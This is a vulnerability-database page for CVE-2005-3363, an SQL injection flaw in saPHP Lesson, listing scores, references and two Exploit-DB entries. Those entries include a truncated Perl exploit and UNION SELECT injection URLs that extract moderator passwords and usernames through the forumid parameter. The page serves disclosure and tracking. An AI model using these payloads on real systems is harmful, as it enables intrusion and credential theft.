CVE-2005-3363
published 2005-10-30CVE-2005-3363: SQL injection vulnerability in Saphp Lesson, possibly saphp Lesson1.1 and saphpLesson2.0, allows remote attackers to execute arbitrary SQL commands via the…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.48%
87.6th percentile
SQL injection vulnerability in Saphp Lesson, possibly saphp Lesson1.1 and saphpLesson2.0, allows remote attackers to execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| saphp | saphplesson | — | — |
| saphp | saphplesson | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
saPHP Lesson 2.0 - 'forumid' SQL Injection
exploitdb·2006-02-25
CVE-2005-3363 saPHP Lesson 2.0 - 'forumid' SQL Injection
saPHP Lesson 2.0 - 'forumid' SQL Injection
---
#!/usr/bin/perl
#
# For password
# http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor
# For username
# http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor
# sent in by SnIpEr_SA (selfar2002[at]hotmail.com)
# ported by str0ke (milw0rm.com)
use LWP::Simple;
$serv = $ARGV[0];
$path = $ARGV[1];
sub usage
{
print "\nSaphpLesson 2.0 SQL-Injection \n";
print "By SnIpEr_SA Ported by str0ke\n";
print "Usage: $0 www.example.com /directory/\n";
print "sever - URL\n";
print "path - path to showcat.php\n";
exit ();
}
sub exploit
{
print qq(
SaphpLesson 2.0 SQL-Injection
By SnIpEr_SA Ported by str0ke\n\n);
$URL = sprintf("http://%s%sshowcat.php?forumid=-1+uni
Exploit-DB
saPHP Lesson - 'add.php?forumid' SQL Injection
exploitdb·2005-10-26
CVE-2005-3363 saPHP Lesson - 'add.php?forumid' SQL Injection
saPHP Lesson - 'add.php?forumid' SQL Injection
---
source: https://www.securityfocus.com/bid/15185/info
saphp Lesson is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
http://www.example.com/dros/add.php?forumid=|almaster
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=113018965520240&w=2http://secunia.com/advisories/17308/http://securityreason.com/securityalert/111http://www.attrition.org/pipermail/vim/2005-October/000313.htmlhttp://www.osvdb.org/20289http://www.osvdb.org/20290http://www.securityfocus.com/archive/1/430906/30/5610/threadedhttp://www.securityfocus.com/archive/1/440120/100/0/threadedhttp://www.securityfocus.com/archive/1/472799/100/0/threadedhttp://www.securityfocus.com/bid/15185https://exchange.xforce.ibmcloud.com/vulnerabilities/22861https://exchange.xforce.ibmcloud.com/vulnerabilities/27746https://www.exploit-db.com/exploits/1530http://marc.info/?l=bugtraq&m=113018965520240&w=2http://secunia.com/advisories/17308/http://securityreason.com/securityalert/111http://www.attrition.org/pipermail/vim/2005-October/000313.htmlhttp://www.osvdb.org/20289http://www.osvdb.org/20290http://www.securityfocus.com/archive/1/430906/30/5610/threadedhttp://www.securityfocus.com/archive/1/440120/100/0/threadedhttp://www.securityfocus.com/archive/1/472799/100/0/threadedhttp://www.securityfocus.com/bid/15185https://exchange.xforce.ibmcloud.com/vulnerabilities/22861https://exchange.xforce.ibmcloud.com/vulnerabilities/27746https://www.exploit-db.com/exploits/1530
2005-10-30
Published